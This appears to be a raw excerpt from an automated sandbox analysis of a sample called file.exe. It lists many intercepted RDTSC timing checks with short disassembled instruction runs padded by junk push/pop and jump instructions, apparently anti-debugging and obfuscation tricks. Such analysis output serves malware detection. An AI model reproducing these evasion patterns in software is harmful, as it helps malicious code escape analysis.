Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8ACC2 second address: C8ACD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99607DC0CFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8CAB2 second address: C8CAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8CAB6 second address: C8CABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8BC70 second address: C8BC75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8CBDA second address: C8CBE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8EB2C second address: C8EB83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub dword ptr [ebp+122D3702h], esi 0x00000010 push 00000000h 0x00000012 mov bx, 73DAh 0x00000016 push 00000000h 0x00000018 jmp 00007F996107E1C3h 0x0000001d call 00007F996107E1BCh 0x00000022 jg 00007F996107E1B6h 0x00000028 pop ebx 0x00000029 push eax 0x0000002a push edi 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8EB83 second address: C8EB87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C91BA6 second address: C91BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F996107E1B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C91BB0 second address: C91BBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F99607DC0C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C94260 second address: C94264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C94264 second address: C94268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8DD04 second address: C8DD08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8DD08 second address: C8DD0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8FD1A second address: C8FD1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C922A5 second address: C922A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C922A9 second address: C922AE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9540B second address: C95411 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C95411 second address: C95481 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F996107E1B8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 movzx ebx, cx 0x00000027 push 00000000h 0x00000029 mov ebx, 688D9EC1h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F996107E1B8h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 0000001Ah 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a mov di, ax 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F996107E1BAh 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C955C3 second address: C955D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C955D7 second address: C955DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C966BF second address: C966C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C96779 second address: C96783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F996107E1B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9D783 second address: C9D787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9D787 second address: C9D791 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F996107E1B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9D791 second address: C9D7AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F99607DC0CFh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA33E1 second address: CA33F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F996107E1BFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA34F0 second address: CA34F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA34F4 second address: CA353C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F996107E1B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F996107E1BCh 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F996107E1C2h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push esi 0x0000001c jne 00007F996107E1BCh 0x00000022 pop esi 0x00000023 mov eax, dword ptr [eax] 0x00000025 ja 00007F996107E1C4h 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA353C second address: CA3540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA3540 second address: CA3553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jnc 00007F996107E1BEh 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA9342 second address: CA9346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA9346 second address: CA934C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8847 second address: CA8864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F99607DC0D0h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA89D0 second address: CA89D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA89D9 second address: CA89DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3B4F8 second address: C3B4FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3B4FC second address: C3B50D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3B50D second address: C3B529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F996107E1C6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAECD7 second address: CAECDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAEE49 second address: CAEE4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAEE4F second address: CAEE53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAE4E2 second address: CAE4EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F996107E1B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAE4EC second address: CAE4F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAF26D second address: CAF271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBAEAC second address: CBAECD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F99607DC0CAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F99607DC0CEh 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBAECD second address: CBAED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBAED1 second address: CBAED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBAED7 second address: CBAEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F996107E1BAh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBAEEB second address: CBAF00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99607DC0D1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB9B18 second address: CB9B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB9C5B second address: CB9C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F99607DC0C6h 0x0000000d jl 00007F99607DC0C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB9C6E second address: CB9C89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1C7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB9DBA second address: CB9DC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F99607DC0C6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB9DC6 second address: CB9DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBA176 second address: CBA180 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99607DC0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBA664 second address: CBA668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2C370 second address: C2C390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99607DC0CFh 0x00000009 jmp 00007F99607DC0CBh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB97F3 second address: CB97F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB97F9 second address: CB97FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB97FD second address: CB9801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB9801 second address: CB9809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB9809 second address: CB9838 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jns 00007F996107E1B6h 0x00000009 jnp 00007F996107E1B6h 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007F996107E1BAh 0x00000018 push edi 0x00000019 jmp 00007F996107E1BCh 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB9838 second address: CB983C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC2B4A second address: CC2B4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1AB2 second address: CC1AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1AB8 second address: CC1AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 je 00007F996107E1C4h 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jne 00007F996107E1B6h 0x00000014 popad 0x00000015 jnl 00007F996107E1C2h 0x0000001b popad 0x0000001c push esi 0x0000001d pushad 0x0000001e jmp 00007F996107E1BBh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1AFD second address: CC1B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99607DC0D1h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7A3D6 second address: C7A3F7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F996107E1C3h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7A5C5 second address: C7A5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F99607DC0C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7AA6A second address: C7AAA5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F996107E1C0h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jo 00007F996107E1C9h 0x00000014 jmp 00007F996107E1C3h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7AAA5 second address: C7AAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7AAAA second address: C7AACF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F996107E1BEh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c sub dword ptr [ebp+122D17F6h], ecx 0x00000012 push 0AA09E41h 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7AACF second address: C7AAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7ABEC second address: C7ABF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7AD56 second address: C7AD5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7AFBD second address: C7AFC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7AFC3 second address: C7AFC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7AFC7 second address: C7B002 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jo 00007F996107E1BCh 0x00000011 mov dword ptr [ebp+122D2E23h], eax 0x00000017 push 00000004h 0x00000019 adc dx, 093Ch 0x0000001e nop 0x0000001f push ebx 0x00000020 pushad 0x00000021 jmp 00007F996107E1C8h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7B002 second address: C7B01C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F99607DC0D1h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7B01C second address: C7B021 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7B021 second address: C7B027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7B411 second address: C7B415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7B415 second address: C7B419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC25A7 second address: CC25AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC25AB second address: CC25B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC25B1 second address: CC25BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC25BB second address: CC25BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC25BF second address: CC25CD instructions: 0x00000000 rdtsc 0x00000002 jl 00007F996107E1B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC25CD second address: CC25D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC2709 second address: CC270F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC270F second address: CC2713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC2713 second address: CC272B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1BEh 0x00000007 jnl 00007F996107E1B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC272B second address: CC274A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F99607DC0D9h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC274A second address: CC276C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F996107E1BEh 0x0000000f js 00007F996107E1B6h 0x00000015 push esi 0x00000016 pop esi 0x00000017 pushad 0x00000018 jno 00007F996107E1B6h 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC57B9 second address: CC57BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC57BF second address: CC57C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC57C5 second address: CC57EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F99607DC0D0h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push ecx 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC57EB second address: CC57F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC57F1 second address: CC5808 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F99607DC0CFh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC5808 second address: CC5818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F996107E1BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC5958 second address: CC595E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC595E second address: CC5982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F996107E1B6h 0x0000000a popad 0x0000000b jmp 00007F996107E1C6h 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC5982 second address: CC5991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jnp 00007F99607DC0D7h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
